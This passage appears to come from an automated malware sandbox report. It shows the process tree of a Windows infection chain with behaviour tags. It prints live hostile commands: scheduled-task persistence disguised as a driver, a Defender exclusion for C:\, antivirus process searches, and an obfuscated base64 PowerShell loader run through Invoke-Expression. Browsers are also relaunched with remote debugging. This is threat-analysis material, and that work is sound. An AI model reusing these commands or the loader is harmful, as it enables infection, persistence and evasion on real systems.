        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:788
    - - C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:7632
    - - C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:9368
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:9640
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:9744
      - C:\Drivers\pcidrv.exe
        
        C:\Drivers\pcidrv.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:9836
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:9864
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:10052
    - - C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:9672
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:9852
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:12780
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:13432
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:13668
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:13676
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1416
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:13864
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5768
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:14868
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:14752
        
        C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:14916
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:960
    - - C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5956
    - - C:\Users\Admin\AppData\Local\Temp\10460870101\RYZusWg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10460870101\RYZusWg.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:9500
    - - C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:12908
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:12376
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:12592
    - - C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:8320
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:11104
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:8664
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:9996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of AdjustPrivilegeToken
        
        PID:10644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:11780
    - - C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:9116
      - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        6⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:12924
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:10556
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:1228
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:9564
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x13c,0x140,0x144,0x138,0x114,0x7ffe8378dcf8,0x7ffe8378dd04,0x7ffe8378dd10
        10⤵
        
        PID:11860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1916,i,10448131954914762770,4930644488488592540,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1912 /prefetch:2
        10⤵
        
        PID:13704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1512,i,10448131954914762770,4930644488488592540,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2184 /prefetch:11
        10⤵
        
        PID:11444
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,10448131954914762770,4930644488488592540,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2412 /prefetch:13
        10⤵
        
        PID:11108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3300,i,10448131954914762770,4930644488488592540,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3312 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:3440
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3604,i,10448131954914762770,4930644488488592540,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3632 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:11800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,10448131954914762770,4930644488488592540,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4492 /prefetch:9
        10⤵
        Uses browser remote debugging
        
        PID:11184
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4592,i,10448131954914762770,4930644488488592540,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4652 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:1852
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4916,i,10448131954914762770,4930644488488592540,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5216 /prefetch:14
        10⤵
        
        PID:8716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        
        PID:976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        10⤵
        Uses browser remote debugging
        
        PID:13592
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x21c,0x7ffe6112f208,0x7ffe6112f214,0x7ffe6112f220
        11⤵
        
        PID:6992
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1828,i,16117297376398397513,4125425296904717557,262144 --variations-seed-version --mojo-platform-channel-handle=1824 /prefetch:2
        11⤵
        
        PID:8388
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2008,i,16117297376398397513,4125425296904717557,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:11
        11⤵
        
        PID:1104
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1796,i,16117297376398397513,4125425296904717557,262144 --variations-seed-version --mojo-platform-channel-handle=2488 /prefetch:13
        11⤵
        
        PID:3552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,16117297376398397513,4125425296904717557,262144 --variations-seed-version --mojo-platform-channel-handle=3456 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:1596
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3444,i,16117297376398397513,4125425296904717557,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:4424
        
        C:\ProgramData\8ymym7yuk6.exe
        
        "C:\ProgramData\8ymym7yuk6.exe"
        9⤵
        
        PID:13208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        
        PID:14492
        
        C:\ProgramData\hlxtr90h47.exe
        
        "C:\ProgramData\hlxtr90h47.exe"
        9⤵
        
        PID:1780
        
        C:\ProgramData\hlxtr90h47.exe
        
        "C:\ProgramData\hlxtr90h47.exe"
        10⤵
        
        PID:6676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        11⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\LhsjUtKUXwvf.exe
        
        "C:\Users\Admin\AppData\Local\LhsjUtKUXwvf.exe"
        11⤵
        
        PID:17756
        
